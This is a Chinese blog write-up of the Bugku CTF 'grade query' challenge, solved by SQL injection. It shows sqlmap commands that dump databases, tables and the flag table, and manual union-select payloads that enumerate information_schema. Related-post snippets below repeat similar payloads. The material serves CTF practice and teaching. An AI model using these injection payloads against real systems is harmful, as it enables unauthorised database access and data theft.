BUGKU WP-成绩查询

最新推荐文章于 2024-08-03 20:34:34 发布
最新推荐文章于 2024-08-03 20:34:34 发布
阅读量142 收藏
点赞数
分类专栏: BUGKU WP 文章标签: python 数据库 mongodb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55631425/article/details/120335154
版权

方法一:在这里插入图片描述打开题目输入1,F12发现注入点在这里插入图片描述为post传参
bp抓下包,把代码盘下来在这里插入图片描述创一个文件在c盘,在文件夹里创建一个txt复制
然后启动我们的sqlmap,复制txt的绝对路径(也可以在bp中把包复制成txt放入sqlmap目录中)在这里插入图片描述python sqlmap.py -r “C:\grades.bugku\1.txt”
在这里插入图片描述连存在的注入类型也报出来了

–dbs 获取所有数据库
python sqlmap.py -r “C:\grades.bugku\1.txt” --dbs在这里插入图片描述
获取skctf下的表
Sqlmap -r “C:\grades.bugku\1.txt” -D skctf --tables
在这里插入图片描述

获取fl4g中的所有内容
在这里插入图片描述
Sqlmap -r “C:\grades.bugku\1.txt” -D skctf -T fl4g --dump在这里插入图片描述
方法二:通过试id=1 id=2 id=3 id=4…知到到4就没有数据了,有姓名,语数外4个字段,id=x ,‘x’字符满足union查询不到回显下一个查询结果
所以注入id=o’ union select 1,2,3,4#在这里插入图片描述查询数据库名
id=a’ union select 1,2,3,4#
发现数据库名skctf
查询表明id=o’ union select 1,2,3,table_name from information_schema.tables where table_schema=‘skctf’#在这里插入图片描述查询列名
id=o’ union select 1,2,3,column_name from information_schema.columns where table_name=‘fl4g’#在这里插入图片描述查询内容
id=o’ union select 1,2,3,skctf_flag from fl4g#,拿到flag在这里插入图片描述

Lear.Du
关注
专栏目录
wordpress采集插件wp-autopost-pro wordpress4.9以上版本完美使用
08-19
【WordPress采集插件WP-AutoPost-Pro】 WordPress采集插件WP-AutoPost-Pro是一款功能强大的自动化内容采集工具,特别适用于WordPress 4.9及以上版本。它允许用户从互联网上自动抓取并发布内容,极大地提高了内容...
bugku--成绩查询
hxhabcd123的博客
08-28 1549
该题记录暴力破解依次破解数据库名、表名、字段名、字段内容的解题过程,以及采用sqlmap工具解题
基于PHP的学生在线成绩管理系统
毕业作品网站
06-29 5526
提供了丰富的功能,是数据库管理轻松便捷,除了常规的数据库管理功能,如编辑或设计表、数据写入、SQL转储、创建或编辑用户,其他有用的功能包括:导入/导出向导、报表创建工具、数据模型、查询创建工具、自动完成代码、数据/结构同步,批处。发布课程信息的增删改,以便让学生选课;查看自己所教的课程及选择该课程的学生并且给该课号的学生录入平时成绩,考试成绩,系统可以按照该课程的比例自动算出总分,提交给管理员,等待审核;管理员,教师,学生这三种用户权限,功能明确,各自独立,而又存在着一定的联系,让教学管理的效率提高了。
bugku-web-成绩查询
最新发布
m0_52484587的博客
08-03 870
先测试:输入1,2,3分别能查到1,2,3号学生的成绩;输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常(所以可以断定sql语句的形式是id = ‘input_id’。然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名:fl4g,sc。注意要加上 --data=“id=1”
Bugku---web---成绩查询
weixin_47450099的博客
06-03 603
sql注入相关知识,内有各种爆破语句
Bugku 成绩查询【WEB】
soysauce123的博客
08-15 480
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程。我们都清楚http的请求方式有两种一个get,一个post,这里就是post。那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿。然后就可以开始查询了,先搜索库。...
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 939
BUGKU CTF--web 基础{成绩查询}解题过程
Learn-wp-cli:命令行,WP-CLI和自定义WP-CLI命令入门
02-05
**WP-CLI(WordPress Command Line Interface)是WordPress开发和管理中的一个强大工具,它允许用户通过命令行界面执行各种操作,而无需通过图形用户界面。本教程将带你深入理解WP-CLI,包括如何安装、使用基础命令...
change-wp-content:将重命名 wp-content 目录的 Wordpress 插件
06-16
更改 wp-content 将 wp-content 目录重命名为“media”的 Wordpress 插件,这可能有助于提高站点安全性。 插件有什么作用? 一方面,它将以下定义添加到您的 wp-config 文件的适当位置: define ( 'WP_CONTENT_...
wordpress定时任务(wp-cron.php)造成主机CPU比较高的解决办法
09-28
WordPress中的定时任务功能主要依赖于wp-cron.php文件,这是一个内置的模拟Linux系统cron job的机制。当WordPress检测到有用户访问网站时,它会检查是否有预定的任务需要执行。这种设计使得WordPress能够在没有实际...
wp-script-core
09-07
标签"wp-script-co"可能是一个简化的版本或者错误,完整的可能是"wp-script-core",用于标识与标题相关的关键词,帮助用户搜索和识别这个插件。在WordPress插件目录中,通常会用这样的标签来分类和组织插件。 **...
BugkuCTF成绩查询
qq_33505576的博客
06-27 744
SQL注入 https://blog.csdn.net/Langtuteng17/article/details/80666660
BUGKU-成绩查询
m0_64180167的博客
12-03 930
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
Bugku 成绩查询
plant1234的博客
06-18 174
成绩查询: 首先根据题目启动环境 这题涉及的相关知识点是: mysql的知识点: union select 联合查询,联合注入常用 database() 回显当前连接的数据库 version() 查看当前sql的版本如:mysql 1.2.3, mariadb-4.5.6 group_concat() 把产生的同一分组中的值用,连接,形成一个字符串 information_schema 存了很多mysql信息的数据库 information_schema.schemata information_schem
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 661
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2190
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
bugku 成绩单 & sqlmap工具的爆破
qq_39368007的博客
06-09 819
发现有POST表单和变量名,就想到了Sqlmap的POST登陆框注入 输入框内填写1,Burp Suite抓包 将内容复制到文本上 -r表示加载一个文件,-p指定参数,这里参数是id 详情请见 https://blog.csdn.net/qq_34072526/article/details/86775668 ...
bugku ctf 成绩查询 解题思路
YouthBelief的博客
03-08 1115
0x00 环境地址 https://ctf.bugku.com/challenges/detail/id/84.html 成绩查询 大概率sql注入 0x01 解题思路 1.1 根据提示输入1 2 3 测试正常数据 1 2 看来是根据id查询 1.2 测试是否报错(不产生报错) ' " ') ") % %) )) 等等 1.3 猜测sql语句为 select Math_score,English_score,Chinese_score from score_table where
BugkuCTF—部分wp
雅戈洛夫的博客
12-23 3888
BugkuCTF——wp Web篇 0x001—web2 解题思路: 1、直接按F12即可找到 0x002—计算器 解题思路: 1、按下F12发现它对输入框的长度进行了限制,先将长度调大 2、在计算给出的题点击验证即可。 0x003—web基础 $_GET 解题思路: 1、提交数据方式为GET传参,所以直接what=flag即可 参考playload:http://123.206.87.240:8002/get/?what=flag 0x004—web基础 $_POST 解题思路: 1、此题是POST传参
WordPress便捷存档插件wp-easyarchives功能介绍
资源摘要信息:"该资源为WordPress的wp-easyarchives插件压缩包文件,文件名为wp-easyarchives.zip。该插件的主要功能是优化和简化WordPress网站的评论系统,使之更加方便、高效和用户友好。通过安装和启用wp-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lear.Du

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值